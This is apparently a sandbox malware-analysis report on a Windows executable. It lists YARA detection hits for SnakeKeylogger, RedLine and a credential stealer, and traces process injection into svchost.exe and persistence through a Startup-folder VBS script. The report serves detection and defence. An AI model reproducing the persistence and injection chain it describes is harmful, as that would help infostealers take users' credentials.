              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -k.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -k.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -k.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -k.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@4/4
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C637B5 GetLastError,FormatMessageW,0_2_00C637B5
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C510BF AdjustTokenPrivileges,CloseHandle,0_2_00C510BF
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C516C3
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EC10BF AdjustTokenPrivileges,CloseHandle,2_2_00EC10BF
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00EC16C3
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C651CD
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C7A67C
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C6648E
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00BF42A2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeFile created: C:\Users\user\AppData\Local\nonsubmergedJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
              Source: C:\Users\user\Desktop\DSD876543456780000.exeFile created: C:\Users\user\AppData\Local\Temp\aut650B.tmpJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
              Source: DSD876543456780000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000003.00000002.4473198929.000000000540F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2236229139.00000000062AA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005434000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005440000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005401000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000584D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2679722335.00000000066BA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000581C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000580E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: DSD876543456780000.exeReversingLabs: Detection: 37%
              Source: C:\Users\user\Desktop\DSD876543456780000.exeFile read: C:\Users\user\Desktop\DSD876543456780000.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\DSD876543456780000.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: C:\Users\user\Desktop\DSD876543456780000.exeProcess created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
              Source: C:\Users\user\Desktop\DSD876543456780000.exeProcess created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\Desktop\DSD876543456780000.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
